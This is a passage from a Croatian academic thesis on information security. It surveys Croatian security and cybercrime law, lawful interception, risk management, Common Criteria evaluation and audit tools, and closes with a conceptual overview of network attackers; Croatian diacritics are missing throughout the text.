sigurnost informacijskog sustava (u okviru koje se utvruju mjere i standardi
informacijske sigurnosti klasificiranog i neklasificiranog podatka koji se obrauju,
pohranjuju ili prenose u informacijskom sustavu, te zatite cjelovitosti i raspoloivosti
informacijskog sustava u procesu planiranja, projektiranja, izgradnje, uporabe,
odravanja i prestanka rada informacijskog sustava, dakle opa pravila zatite
podataka realizirane na fizikoj, tehnikoj ili organizacijskoj razini);
sigurnost poslovne suradnje (podruje informacijske sigurnosti u kojem se
primjenjuju propisane mjere i standardi informacijske sigurnosti za provedbu
natjeaja ili ugovora s klasificiranom dokumentacijom koji obvezuju pravne i fizike
osobe navedene u lanku 1. stavka 3. Zakona o informacijskoj sigurnosti (NN, broj
79/07).
Pojam klasificiranih podataka odnosi se na one koje je nadleno tijelo, u propisanom
postupku, takvima oznailo i za koje je utvren stupanj tajnosti, kao i podaci koje je Republici
Hrvatskoj tako oznaene predala druga drava, meunarodna organizacija ili institucija s kojom
Republika Hrvatska surauje22. Neklasificirani podaci nemaju utvrenog stupnja tajnosti.
Stupnjevi tajnosti klasificiranih podataka su:

VRLO TAJNO,

TAJNO,

POVJERLJIVO,

21

lanak 7. Zakona o informacijskoj sigurnosti, NN, 79/07.

22

lanak 2. Zakona o tajnosti podataka (NN 79/07, 86/12)

15

OGRANIENO.
Obzirom na stupanj ugroze zatienih vrijednosti stupnjevima tajnosti iz lanka mogu se

klasificirati podaci iz djelokruga dravnih tijela u podruju obrane, sigurnosno-obavjetajnog


sustava, vanjskih poslova, javne sigurnosti, kaznenog postupka te znanosti, tehnologije, javnih
financija i gospodarstva ukoliko su podaci od sigurnosnog interesa za Republiku Hrvatsku23.
Tako odreeni stupnjevi tajnosti pojedinih podataka odreuju odnosno ograniavaju mogunost
pristupanja istima ime se izravno pozitivno utjee na informacijsku sigurnost.
U Republici Hrvatskoj informacijska sigurnost regulirana je brojnim zakonima a neki od
esencijalnih su:

Zakon o informacijskoj sigurnosti,

Zakon o zatiti osobnih podataka,

Zakon o tajnosti podataka,

Zakon o sigurnosnim provjerama,

Zakon o sigurnosno obavjetajnom sustavu RH,

Zakon o elektronikoj ispravi.

3.1.2 Kaznenopravni aspekt sigurnosti raunalne komunikacije

Kaznena djela, dakle ona koja u relevantnom smislu predstavljaju ugrozu nekih od
zakonom zatienih drutvenih i temeljnih vrijednosti i prava a odnose se na zatitu raunalnih
podataka i sustava, u hrvatskom su zakonodavstvu svrstana i obuhvaena glavom dvadeset
petom Kaznenog zakona "Kaznena djela protiv raunalnih sustava, programa i podataka" i
ima ih ukupno osam24:
-

Neovlateni pristup, lanak 266., zatvorska kazna 1 3 godine, kanjivo u pokuaju;

Ometanje rada raunalnog sustava, lanak 267., zatvorska kazna do 3 godine, kanjivo
u pokuaju;

Oteenje raunalnih podataka, lanak 268., zatvorska kazna do 3 godine, kanjivo u


pokuaju;

23

lanak 4. i 5. Zakona o Zakona o tajnosti podataka (NN 79/07, 86/12)

24

Kazneni zakon, NN 125/11., 144/12.

16

Neovlateno presretanje raunalnih podataka, lanak 269., zatvorska kazna do 3


godine, kanjivo u pokuaju;

Raunalno krivotvorenje, lanak 270., zatvorska kazna do 3 godine, kanjivo u


pokuaju;

Raunalna prijevara, lanak 271., zatvorska kazna 6 mjeseci 8 godina, kanjivo u


pokuaju;

Zlouporaba naprava, lanak 272., zatvorska kazna 1 3 godine

Teka kaznena djela protiv raunalnih sustava, programa i podataka, lanak 273. predstavlja kvalifikaciju ukoliko su navedena kaznena djela poinjena prema tijelima
dravne vlasti, jedinica lokalne ili podrune (regionalne) samouprave, javne ustanove ili
trgovakog drutva od posebnog javnog interesa.
Odmah moemo uoiti da su kanjive radnje opisane glavom 25. Kaznenog zakona

svrstana u tea kaznena djela samom injenicom to su i gotovo sva ona kojih je zaprijeena
najdulja kazna zatvora nia od pet godina kanjiva u pokuaju.
Kratkim pregledom navedene glave KZ-a zakljuujemo da su zakonom zatieno dobro
raunala i njihovi meusobni sustavi, odnosno podaci koji se na njima nalaze. Tako se kanjivim
smatra svako onesposobljavanje ili ometanje rada raunala ili raunalnih sustava, neovlateni
pristup istima, omoguavanje pristupa drugima, oteenje, neovlateno presnimavanje podataka,
ustupanje podataka drugim osobama, pa ak i ustupanje programa ili naprava kojima se gore
navedene radnje mogu poiniti ukoliko postoji namjera poinjenja.
Meutim, izuzetak predstavlja provedba posebnih dokaznih radnji iz lanka 332. Zakona
o kaznenom postupku. Pravni uvjeti za primjenu posebnih dokaznih radnji ustanovljeni su
primjenom naela postupnosti tako da se na prvom mjestu odreuje granica izmeu Ustavom i
meunarodnim dokumentima o ljudskim pravima priznatih i zatienih prava, te drutvenog
interesa (prema Glui, Krapac, Tomaevi, 2012).
Na drugom je mjestu utvrivanje granica u kojima neko temeljno pravo, u sluajevima
kolizije s drugim temeljnim pravima graana i/ili zajednikog interesa, moe prevladati dok se
na kraju odreuju razine jakosti temeljnih prava u sluajevima njihova meusobnog preklapanja
i/ili sukoba sa zajednikim interesom (prema Glui, Krapac, Tomaevi, 2012).
Ovaj posljednji korak prof. dr. sc. Krapac naroito istie u procesu normiranja, jer je on
procesno pravne naravi. Prvenstveno je vaan za zakonodavca, jer je na zakonodavcu
odgovornost za usklaenost zakonskih normi i normativnu zastitu prava graana, dok za

17

izvritelje vrijede ponajprije pravila postupanja usklaenog i utemeljenog na zakonu (prema


Glui, Krapac, Tomaevi, 2012).
Tako je u glavi 12. Zakona o kaznenom postupku, lankom 332. u stavku 1. normativno
odreen pravni osnov provedbe posebnih dokaznih radnji:
Ako se izvidi kaznenih djela ne bi mogli provesti na drugi nain ili bi to bilo mogue
samo uz nerazmjerne tekoe, na pisani obrazloeni zahtjev dravnog odvjetnika, sudac
istrage moe protiv osobe za koju postoje osnove sumnje da je sama poinila ili zajedno s
drugim osobama sudjelovala u kaznenom djelu iz lanka 334. ZKP-a, pisanim, obrazloenim
nalogom odrediti posebne dokazne radnje kojima se privremeno ograniavaju odreena
ustavna prava graana..."25.
Dakle, osim to zadiranje u temeljna prava graana mora biti utemeljeno na normi
zakonskog ranga, ono mora biti i legitimirano teinom kaznenog djela koje se istrauje to je i
odreeno l. 334. ZKP-a koji taksativno nabraja konkretna kaznena djela za koja se posebne
dokazne radnje mogu primijeniti (Glui, Krapac, Tomaevi, 2012).
U konkretnom sluaju, govorimo o provoenju posebne dokazne radnje iz lanka 332.
stavak 1. toka 2. Zakona o kaznenom postupku - Presretanje, prikupljanje i snimanje
raunalnih podataka.
Presretanje, prikupljanje i snimanje raunalnih podataka provodi se prikriveno iz
prostorija policije, odnosno drugih odgovarajuih prostora. Presretanje raunalnih podataka
provodi se pomou odgovarajuih programskih rjeenja i tehnikih suelja. Policija na pogodan
nain provodi privremeno elektroniko snimanje (pohranu) presretanih i prikupljenih podataka
za vrijeme trajanja posebne dokazne radnje u svojim prostorijama te osigurava tehnike i
programske preduvjete za obradu privremeno pohranjenih podataka, snimanje i dostavu snimke i
dokumentacije tehnikog zapisa. Pomou odgovarajuih tehnikih i programskih rjeenja
policija provodi uvid u sadraj presretanih i prikupljenih raunalnih podataka i sastavlja saetke
sadraja koji predstavljaju dokumentacije tehnikog zapisa.26.
3.2 Sigurnosni rizik

Sigurnosni rizik definiran je kao mogunost realizacije nekog neeljenog dogaaja, koji
moe negativno konotirati na povjerljivost (eng. confidentiality), integritet (eng. integrity) i
25

Zakon o kaznenom postupku NN 152/08., 76/09., 80/11., 121/11., 143/12., 56/13.,145/13.

26

lanak 6. - 9. Pravilnika o nainu provoenja posebnih dokaznih radnji, NN 102/09.

18

raspoloivost (eng. availability) informacijskih resursa. Pod informacijskim resursima


podrazumijevamo sva ona sredstva koja se rabe u svrhu ostvarivanja ciljeva (hardver, softver,
ljudski resursi, podaci i sl.)27.
3.2.1 Upravljanje sigurnosnim rizikom

Precizna identifikacija, odnosno klasifikacija informacijskih resursa prvi je korak procesa


upravljanja sigurnosnim rizikom. Na temelju njega odreuje se koji resursi zahtijevaju kakav
tretman sa stajalita sigurnosti. Upravljanje sigurnosnim rizikom (eng. Risk Management),
disciplina koja je proizala iz potrebe za standardizacijom i formalizacijom postupaka vezanih uz
upravljanje sigurnou. Definira se kao proces identifikacije onih imbenika koji mogu
negativno utjecati na povjerljivost, integritet, i raspoloivost raunalnih resursa, kao i njihova
analiza u smislu vrijednosti pojedinih resursa i trokova njihove zatite (Souppaya, Miles i
Wack, 2003).

Zavrni korak obuhvaa poduzimanje zatitnih mjera koje e identificirani

sigurnosni rizik svesti na prihvatljivu razinu, u skladu s ciljevima organizacije28.


Proces upravljanja sigurnosnim rizicima sastoji se od tri faze29:
procjena rizika (eng. Risk Assessment);
umanjivanje rizika (eng. Risk Mitigation);
ispitivanje i analiza (eng. Evaluation and Assessment).
3.2.2 Procjena rizika

Ukupnost procesa upravljanja sigurnosnim rizikom ukljuuje identifikaciju, analizu i


uklanjanje rizika, kao i njegovo povremeno periodiko ispitivanje i evaluaciju, dok je faza
procjene rizika vezana iskljuivo uz konkretno odreivanje sigurnosnog rizika, svojstvenog
pojedinom resursu. Detaljna analiza svih prijetnji i ranjivosti, vjerojatnosti realizacije rizika i
moguih posljedica, kao i analiza trokova/dobiti (eng. cost/benefit) sigurnosnih kontrola za
uklanjanje rizika, ukljueni su u ovaj proces. Rezultati provedenog postupka procjene rizika
redovito se koriste prilikom odluke na kojim e se mjestima i u kojoj mjeri rizik reducirati, a na
27

prema Feringa, A., Goguen. A. i Stoneburner, G. (2001). Risk Management Guide for Information
Technology Systems. National Institute of Standards and Technology. Washington: US Government
printing office, str. 8.
28

CARNet CERT u suradnji s LS&S, (2003). Upravljanje sigurnosnim rizicima. CCERT-PUBDOC-200310-44. Revizija v1.1.http://security.lss.hr/documents/LinkedDocuments/CCERT-PUBDOC-2003-1044.pdf. (preuzeto 24.03.2014.), str. 4.
29

loc. cit.

19

kojim e se mjestima primijeniti druge tehnike upravljanja rizikom (ignoriranje, prebacivanje


drugim organizacijama i sl.). Proces procjene rizika sastoji se od devet koraka; Identifikacija i
klasifikacija resursa (eng. Asset Identification); Identifikacija prijetnji (eng. Threat
identification); Identifikacija ranjivosti (eng. Vulnerability Identification); Analiza postojeih
kontrola (eng. Control Analysis); Vjerojatnost pojave neeljenih dogaaja (eng. Likelihood
Determination); Analiza posljedica (eng. Impact Analysis); Odreivanje rizika (eng. Risk
Determination); Preporuke za umanjivanje (eng. Control Recommendation); Dokumentacija
(eng. Result Documentation) (prema Feringa, Goguen, Stoneburner, 2001:8).
3.2.3 Umanjivanje rizika

Umanjivanje rizika druga je faza procesa upravljanja sigurnosnim rizikom, u kojoj se


analiziraju, evaluiraju, a kasnije i implementiraju odgovarajue sigurnosne kontrole. Rizik se
umanjuje u onoj mjeri koja e zadovoljiti potrebe i ciljeve organizacije. Na koji e se nain i u
kojoj mjeri umanjivati rizik, donosi se na temelju detaljne evaluacije ponuenih rjeenja. Ideja je
da se implementiraju ona rjeenja koja su financijski najprihvatljivija, ona koja e rezultirati to
kvalitetnijim i to pouzdanijim sigurnosnim kontrolama, s minimalnim utjecajem na misiju i
poslovne procese organizacije30.
Opcije za umanjivanje rizika31:
Umanjivanje rizika pristup koji podrazumijeva implementaciju odgovarajuih
sigurnosnih kontrola s ciljem smanjivanja identificiranog sigurnosnog rizika;
Transfer rizika u ovom sluaju se rizik i trokovi u sluaju njegove realizacije
prebacuje nekoj drugoj organizaciji (eng. outsourcing);
Prihvaanje rizika postupak kojim se identificirani rizik prihvaa kao takav
bez implementacije ikakvih sigurnosnih kontrola. Ukoliko cost/benefit analize
pokau da je vei troak ulagati u zatitu resursa, nego to predstavlja njegov
gubitak, tada se primjenjuje ovaj pristup. Odluka o prihvaanju rizika povlai
veliku odgovornost, i redovito zahtjeva pismeno izvjee o tome tko je odgovoran
i zato kontrole nisu implementirane;
Odbacivanje rizika pristup koji podrazumijeva potpuno zanemarivanje
sigurnosnog rizika. Opovrgavanje ili svjesno ignoriranje rizika u nadi da on
30

CARNet CERT u suradnji s LS&S, op. cit., str. 12.

31

prema Feringa, A., Goguen. A., Stoneburner, G. (2001). Risk Management Guide for Information
Technology Systems. National Institute of Standards and Technology, str. 27.

20

nikada nee biti realiziran potpuno je neprihvatljiv pristup i ne smije se provoditi


niti u jednom sluaju.

Rizik koji ostaje nakon implementacije sigurnosnih kontrola naziva se rezidualnim


rizikom i on podrazumijeva sve one prijetnje i ranjivosti za koje se smatra da ne zahtijevaju
dodatni tretman u pogledu umanjivanja postojeeg rizika. Prisutnost rezidualnog rizika
posljedica je provedenih cost/benefit analiza kojima je ustanovljeno da su trokovi zatite vei od
trokova u sluaju njegove realizacije32.

3.2.4 Ispitivanje i analiza

Budui da su informacijski resursi podloni vrlo estim promjenama, potreba za


periodikim analizama i evaluacijama neophodna je za odravanjem jednom postignute razine
sigurnosti. Promjene u mrenoj i raunalnoj opremi, nadogradnja ili instalacija novih
programskih paketa, promjene u ljudskom kadru i sl., sve su elementi koji utjeu na sigurnosni
rizik u informacijskim sustavima. Ukoliko se o ovakvim promjenama ne vodi dovoljno rauna,
sustav se vrlo brzo moe dovesti u stanje koje predstavlja neprihvatljiv sigurnosni rizik za
organizaciju i njene poslovne ciljeve. Koliko esto e se provoditi proces procjene rizika ovisiti
e primarno o dinamici promjena u organizaciji. Ukoliko je sustav izloen estim promjenama,
procjenu rizika poeljno je raditi ee33.
3.3 Evaluacija sustava

Zbog kompleksnosti informacijskih tehnologija sve je tee odluiti zadovoljava li neki


sustav odreene kriterije i funkcionalnosti. Ovo je posebice naglaeno u polju IT sigurnosti. Iz
ovih su razloga jo krajem 70 - ih godina prolog stoljea pokrenute inicijative vlada mnogih
drava kako bi se utvrdile sheme, a posebice katalozi kriterija i evaluacijskih ustanova koje bi,
kao neutralna strana, provodile sigurnosnu evaluaciju i certifikaciju IT proizvoda i sustava.
Sigurnost se moe evaluirati unutar posebnih sustava koji rade u poznatoj okolini, npr. vojni
infromacijski sustavi, kao i unutar proizvoda koji se mogu proizvoditi za masovno trite kao
to su osobni sigurnosni alati. Certifikati se izdaju od strane nacionalnih agencija koje mogu
32

CARNet CERT u suradnji s LS&S, op. cit., str. 13.

33

CARNet CERT u suradnji s LS&S, op. cit., str. 16.

21

ovlastiti evaluacije kao i izdavanja evaluacijskih izvjetaja akreditiranim ustanovama (eng.


Information technology security evaluation facilities, skraeno ITSEF). Troak evaluacije snosi
sponzor evaluacije, koji je i najee i proizvoa objekta evaluacije. Iako postoje osnovane
kritike o generalnoj nesigurnosti IT sustava kao i na neprikladan metriki pristup trenutnim
evaluacijskim kriterijima, dananji korisnici trebaju pomo prilikom analize sigurnosnih
alternativa na tritu s obzirom na zahtjeve svojih sustava, te informacija koje treba zatititi.
Evaluacija i certifikacija od strane neutralne i nezavisne organizacije ini se kao najbolja
solucija, a evaluacijski kriteriji nain su za podizanje razine usporedivosti sigurnosnih
certifikata34.
Koritenje standardiziranih dokumentiranih evaluacijskih procedura i alata moe doprinijeti
pridravanju etiriju osnovnih principa evaluacije; objektivnost, konzistentnost, ponovljivost i
nepristranost35:
a) Nepristranost: sve evaluacije moraju biti provedene bez pristranosti evaluatora;
b) Objektivnost: Rezultati svih testova moraju se dobiti s minimumom subjektivnog
suda ili miljenja;
c) Konzistentnost: Ponovnom evaluacijom istog TOE-a (eng. Target of Evaluation
objekt evaluacije) nad istom sigurnosnom metom istog ITSEF-a mora se doi do
istih zakljuaka i rezulata kao i prilikom prve evaluacije;
d) Ponovljivost: Ponovnom evaluacijom istog TOE-a nad istom sigurnosnom metom
razliitog ITSEF-a mora se doi do istih zakljuaka i rezulata kao i prvi ITSEF koji
je proveo evaluaciju.
Aspekti uinkovitosti postupka, kao to su identifikacije ranjivosti, snaga mehanizama, te
iskoristivost ranjivosti, poseban su predmet razmatranja jer u postupak evaluacije uvode
subjektivne faktore kao to je iskustvo i intuicija. Subjektivnost nije mogue do kraja iskljuiti iz
procesa evaluacije. On zahtijeva uee strane s neovisnim pregledom nad evaluacijom kao to
su Certifikacijske agencije, koje osiguravaju konzistentnost i usporedivost meu rezultatima
razliitih ITSEF-a. to je via razina evaluacije i jaina mehanizama, korisnik moe biti sigurniji
u protumjere ugraene u IT sustav proizvoda. Evaluacijska razina koju zahtijeva korisnik ovisi o
prihvatljivoj razini poznatog rezidualnog rizika, i moe se odrediti analizom rizika i prijetnji za
34

Mareta, M. (2008). Ispitivanje i evaluacija sigurnosti seminarski rad. Sveuilite u Zagrebu, Fakultet
elektrotehnike i raunarstva. http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm, (preuzeto 24.03.2014.), pogl. 6. Evaluacija sustava.
35

COMMISSION OF THE EUROPEAN COMMUNITIES (1993). Information Technology Security


Evaluation Manual (ITSEM), Brusselles, str. 30.

22

specifinu situaciju. Sustav ili dio sustava s viom evaluacijskom razinom skuplji su zbog toga
to se prilikom razvoja i evaluacije mora provesti kompliciranije i skuplje testove36.
Slika 8: Osnovni principi evaluacije

Izvor: http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm#_Toc209723903
3.3.1 Evaluacijske tehnike i alati

Tehniki ekvivalenti rezultata evaluacije podrani su kada se koriste standardne


procedure ukljuujui koritenje primjerenih evaluacijskih tehnologija. Tijekom evaluacijskog
procesa evaluatori mogu koristiti alate i tehnike kojima ostvaruju najbolji omjer cijene i
preformansi, te najkrae potrebno vrijeme. Koritenjem takvih tehnika pomae pri ostvarivanju
objektivnosti, konzistentnosti, te ponovljivosti37.
Osnovne

evaluacijske

tehnike

(prema

COMMISSION

OF

THE

EUROPEAN

COMMUNITIES, 1993:83):
Neformalan pregled (eng. Informal Examination)- jednostavna evaluatorska tehnika
bazirana na prouavanju dokumentacije;
Compliancy analysis - metodinija tehnika koja se koristi za provjeru konzistentnosti; za
svaku komponentu vie razine provjerava je li implementirana korektno i na nioj razini,
te za svaku komponentu nie razine provjerava u viim razinama je li njeno postojanje
opravdano;
Analiza sljedljivosti (eng. Traceability analysis) - opisuje korektnost usavravanja
funkcija koje provode sigurnost kroz reprezentacije TOE-a, do krajnje implementacije u
36

prema Rannenberg, K. (2008). Recent Development in Information Technology Security Evaluation


The Need for Evaluation Criteria for multilateral Security, Department for Telematics, Institute for
Informatics and Society. University of Freiburg. Germany, pp. 113-128, str. 2.
37

COMMISSION OF THE EUROPEAN COMMUNITIES (1993). Information Technology Security


Evaluation Manual (ITSEM), Brusselles, str. 83.

23

formi izvrnih kodova i elektrinih krugova. Provjerama usklaenosti funkcija sigurnosti


sigurnosnih ciljeva kroz arhitekturni dizajn, implementaciju i funkcionalnost TOE-a,
poveava se razina sigurnosti u odnosu na ispitivani objekt.

Evaluacijske alate moemo podijeliti na (Mareta, 2008, prema: COMMISSION OF THE


EUROPEAN COMMUNITIES, 1993:95):
Animacijski alate - obino se koriste u ranim fazama razvoja TOE-a, kako bi se
provjerilie reprezentacije visoke razine kao to su sigurnosni ciljevi. Ovi se alati
najee koriste kako bi se izvrila formalna specifikacija ikako bi se provjerila
svojstva te razine reprezentacije;
CASE alate - oni se kriste za dobivanje detaljnog dizajna sustava, a evaluatori ih
koriste za detaljnu validaciju dizajna, pomou validacijskih opcija koje alat posjeduje.
Neke od pogreaka koje se mogu pronai koristei ove metode su; tok podataka koji
nije konzistentan i meu dijagramima razliitih razina hijerarhije dizajna, podatke
koji se generiraju ali ih nikada ne koriste procesi, postojanje referenci na
nedefiniranim objektima;
Alate za detaljnu provjeru dizajna - mogu provjeravati kako semantiki i
sintaktiki source kod odgovara specifikacijama, izvode provjere korektnosti na
sintaksnoj (kompletnost, koherencija) ili semantikoj razini, stvaraju poveznice
izmeu funkcija i specifikacija, prouavaju tijek podataka;
Alate za analizu source koda - provjeravaju nepravilno koritenje podataka,
beskonane petlje, nedohvatljive dijelove koda, neeljene ovisnosti podataka,
funkcionalnost koda s formalnom specifikacijom;
Alate za analizu hardvera - pomou CAD (eng. Computer Aided Design) alata;
Audit i alate za provjeru konfiguracije.
Brz i jeftin nain ispitivanja sigurnosti raunalnog sustava predstavljaju web zasnovani
audit alati. Brojne tvrtke pruaju ovu uslugu, a koliko su pouzdani teko je procijeniti, no za
osobna raunala sasvim su dovoljni. Veoma su praktini jer se veoma brzo moe doi do popisa
potencijalnih ranjivosti, kao i mjesta gdje moemo pronai odgovarajue zakrpe za njih. Jedan
od takvih alata je i Belarc Advisor audit tool. Veim se i kompleksnijim sustavima preporuuje
cjeloviti audit38.
38

Mareta, M., op. cit., pog. 7. Ispitivanje jednostavnog audit alata.

24

Belarc Advisor gradi detaljan profil instaliranog softvera i hardvera, ukljuujui i


primjenjene zakrpe i serijske brojeve softvera, te prikazuje rezultate u web pregledniku. Sve se
informacije PC profila uvaju privatno na raunalu, i ne alju web posluiteljima39.

Slika 9: Belarc Advisor izvjetaj

Izvor: http://os2.zemris.fer.hr/ISMS/2008_marceta/Evaluacija%20i%20ispitivanje
%20sigurnosti%20sustava.htm
Aplikacija analizira slabe toke raunala, pritom provjeravajui elemente kao to su
aktualizacije antivirusnih definicija, jesu li sve dostupne zakrpe primijenjene i sl. Koristi CIS
benchmark testove kako bi ocijenio stanje raunala i time prikazao cjelovitu sigurnosnu razinu
raunala. Ovaj alat ne analizira samo softver i komponente operacijskog sustava, njegov detaljan
39

loc. cit.

25

izvjetaj sadrava i popis fizikih komponenti; npr. ne samo koliko je RAM memorije ugraeno
u raunalo, ve i koje je vrste i koje slotove zauzima. Ovaj program ne rjeava pronaene
probleme, ali predlae kako se najbolje pozabaviti njima. Izvjetaj zapoinje osnovnim podacima
kao to su proizvoa raunala, instalirani RAM, veliina hard diska, tip i brzina procesora, ali
isto tako prikazuje proizvoaa matine ploe, i hard diska, serijski broj, tip i brzinu sabirnice,
multimedijske komponente... te jo mnogo toga. U izvjetaju se nalaze i detalji o instalaciji
operativnog sustava, ukljuujui i koje su zakrpe instalirane, a koje nedostaju, kao i listu
korisnikih rauna raunala. Ovim alatom dobivamo pregledan izvjetaj o memorijskim
modulima, lokalnim diskovnim jedinicama, pisaima, instaliranim licencama, instaliranom
softveru, multimadijske informacije, anti virusni status... Izvjetaj se moe sauvati, ili ponovo
generirati po potrebi40.
Belarc Advisor prilagoen je za sljedee operacijske sustave: Windows 8, Windows 7,
Windows Vista, 2003, XP, 2000, NT, ME, 98 i 95. Zahtijeva Internet Explorer ili Netscape
verzije 3 ili vie, Opera, Mozilla, Firefox i Chrome takoer su podrani.
Sve u svemu, ovo je zanimljiv i jednostavan audit alat, jednostavan za uporabu, te
predstavlja brz i jeftin nain skeniranja raunala, koji pritom izgrauje detaljan profil
instaliranog hardvera i softvera. Vrlo je jednostavan za koritenje, po zavretku instalacije i
prihvaanja licence, jednim klikom doe se do rezultata. Alat je u freeware verziji dostupan na41.
Evaluacija je skup i dugotrajan proces, a sponzori evaluacija za uzvrat ne moraju nuno
dobiti sigurniji proizvod. Evaluacijom se najee fokusiraju na evaluiranje dokumentacije, a ne
tehnike korektnosti ili zasluge samog proizvoda. Prilikom pripreme evaluacijskih dokaza i
ostale dokumentacije vezane za evaluaciju vrijeme i trud koji se uloe golemi su, a nekada,
ovisno o veliini TOE-a, proizvod moe zastarit dok se proces zavri. Jo jedan problem
evaluacije je taj kako se sustav evaluira za tono odreenu konfiguraciju, i odreene uvjete rada i
okoline42.
Zajedniki kriterij za sigurnosnu evaluaciju informacijskih tehnologija (eng. Common
Criteria for Information Technology Security Evaluation, skraeno Common Criteria ili CC)43
predstavlja internacionalnu normu (ISO/IEC 15408)44 za raunalnu sigurnost. Certifikacija
40

loc. cit.

41

Belarc audit alat. http://www.belarc.com/free_download.html. (preuzeto 15.03.2014.).

42

Mareta, M., op. cit., pog. 8. Zakljuak

43

Zajedniki kriterij. http://en.wikipedia.org/wiki/Common_Criteria. (preuzeto 15.03.2014.).

44

ISO/IEC 15408 norma. http://www.comsec.spb.ru/matherials/is/iso15408-1.pdf. (preuzeto 15.03.2014.).

26

Zajednikim kriterijem donekle je ograniena samo na IT alate. Dok se druge norme kao to je
npr. ISO/IEC 2700245 bave i meudjelovanjem, upravljanjem sustavom, treniranjem korisnika,
sigurnosnim politikama. Ako proizvod dobije certifikat Zajednikog kriterija ili nekog kriterija
slinog njemu, to nuno ne znai kako je on kompletno siguran. Na primjer Microsoft Windows
2000 certificirani je produkt razine EAL4+, ali regularno su izlazile nove sigurnosne zakrpe za
otkrivene ranjivosti (Mareta, 2008).
Ovo je mogue jer proces dobivanja ceritfikata doputa sponzoru evaluacije neke
pretpostavke o operacijskom okruenju proizvda kao i jaini prijetnji s kojima se proizvod
susree u tom okruenju. Na tim se pretpostavkama evaluiraju sigurnosne funkcije proizvoda.
Kako je MS windows 2000 dobio certifikat EAL4+, trebao bi se smatrati sigurnim samo u
pretpostavljenom okruenju i okolnostima koje su se pretpostavljale prilikom evaluacije. Kada bi
bilo koja od ovih sigurnosnih ranjivosti bila iskoristiva u evaluirenoj konfiguraciji proizvoda,
certifikat bi trebalo povui, ili sponzor moe naruiti reevaluaciju proizvoda kako bi se ukljuile
zakrpe koje rjeavaju pronaene ranjivosti unutar evaluirane konfiguracije, a ukoliko to ne uini
ukida se certifikat nad tim prozvodom (Mareta, 2008).
MS Windows 2000 ostaje EAL4+ bez ukljuenja aplikacije bilo kojih sigurnosnih zakrpa
na svoju evaluiranu konfiguraciju, to pokazuje limitacije kao i snagu evaluirane konfiguracije
(Mareta, 2008).
Glavni principi informacijske sigurnosti trebali bi se temeljiti na jednostavnosti.
Kompleksnost sigurnosnih mehanizama, kao i samih sustava je uvijek polazite mnogih
sigurnosnih pitanja i problema. Nadalje, sigurnost sustava ne smije ovisiti o tajnosti njegove
implementacije ili pojedinih komponenti. U sluaju pada sustava, sigurnosne mjere trebale bi
jo uvijek biti u funkciji. U najveoj moguoj mjeri poeljno je razdvojiti pojedine
funkcionalnosti sustava kao i njegovih korisnika i administratora.
Sigurnost sustava ne bi smjela omesti korisnika u obavljanju svakodnevnih zadaa, a u
tom smislu potrebno je pronai pravu mjeru. Ukoliko se korisnici suoe sa previe
ograniavajuim mjerama sigurnosti, nai e nain da ih zaobiu ili kompromitiraju (npr.
zapisivat e dugake i jake lozinke na lako vidljivim i dostupnim mjestima).
Sigurnosni mehanizmi moraju biti slojeviti tako da kompromitiranje jednog sigurnosnog
mehanizma ne dovodi do kompromitiranja cijelog sustava. Kada je sustav kompromitiran, treba
dokumentirati dogaaj jer prikupljene informacije mogu pomoi pri identifikaciji metoda i
exploit-a koje je koristio napada, prilikom poboljanja sigurnosti sustava, kao i za otkrivanje i
45

ISO/IEC 27002 norma. http://www.iso27001security.com/html/27002.html. (preuzeto 15.03.2014.).

27

kazneno gonjenje poinitelja. No ak i uz sve ove mjere opreza, nitko ne moe garantirati da e
sustav biti stopostotno siguran, stoga jedino to moemo uiniti jest ispitivati najizloenije toke
sustava, provjeravati jesu li virusne definicije aurirane, a zatitne stijene dobro konfigurirane
(Mareta, 2008).

4. MJERE SIGURNOSTI RAUNALNE KOMUNIKACIJE


Tema sigurnosti i zatite je vrlo opsena, ali sadri nekoliko dobro definiranih sredinjih
problema, metoda, sredstava i ciljeva. U raunalnoj mrei treba tititi mreu kao tehnoloki
sustav, treba tititi komunikatore i treba tititi informacijske sadraje. U govoru o mrenoj
komunikaciji istiu se tri osnovna aspekta zatite i sigurnosti: (1) zatita povjerljivosti (tajnosti)
sadraja koji se prenose mreom, (2) zatita integriteta (izvornosti) sadraja od njegovog
zlonamjernog iskrivljenja u prijenosu, i (3) utvrivanje autentinosti komunikatora - to jest,
zatita od onih komunikatora koji se lano predstavljaju (Radovan, 2011).
Komunikatori mogu biti u vidu osoba koje razmjenjuju osobne poruke, usmjerivaa (eng.
router) koji meusobno razmjenjuju pakete podataka odnosno svaki od elemenata sustava
raunalne komunikacije u meusobnoj interakciji.
Bitan je i pojam pouzdanosti koji se odnosi na ispravnost prijenosa sadraja u
raunalnoj mrei. Prijenosni sustav je pouzdan ako otkriva i ispravlja nehotine (tehnike)
greke koje nastaju u prijenosu, sve dok ne izvri ispravan prijenos sadraja. S druge strane,
pojam sigurnosti odnosi se na zatitu prijenosnog sustava i komunikacije od namjernih
ometanja i iskrivljenja; takva ometanja mogu poduzimati razni subjekti iz raznih razloga
(Radovan, 2011:2).
Onog koji napada komunikacijski sustav i komunikaciju, u engleskoj literaturi obino se
oznaava pojmom intruder; to znai nametljivac ili uljez. Napadai tj. oni koji namjerno
ometaju rad raunalne mree, proces komunikacije i integritet sadraja u raunalnoj mrei,
razlog su zbog kojeg se valja baviti pitanjem sigurnosti raunalnih mrea i oni od kojih se nastoji

28

zatititi mrenu komunikaciju. Napada moe prislukivati tuu komunikaciju i time ometati
povjerljivost mrene komunikacije. Prislukivanje obino znai kopiranje podatkovnih i
upravljakih sadraja (paketa) koji se prenose mreom; takvo kopiranje moe se izvoditi
naprimjer na usmjerivaima ruterima kroz koje ti sadraji prolaze (Radovan, 2011:4).
Napada moe iz osobnih razloga preuzimati, mijenjati, blokirati, skretati ili brisati
poruke koje se prenose mreom u odnosu na adresu primatelja kojem su namijenjene. Napada
se moe i lano predstavljati (kao da je netko drugi) te tako pseudonimno nainiti raznovrsne
tete u raunalnoj mrei.
Napada moe ometati ispravan rad raunalne mree na razne naine i iz raznih pobuda.
Moe to initi sa ciljem da stekne neku korist, npr. da preusmjeri neku financijsku transakciju
(na svoj raun), da ometa poslovanje konkurentske tvrtke, ili da ukrade neke podatke.
Napada moe izvoditi razne oblike napada i bez materijalnih pobuda radi npr. samog
"nadmetanja sa sustavom" dok e neki to initi iz istih destruktivnih nakana.
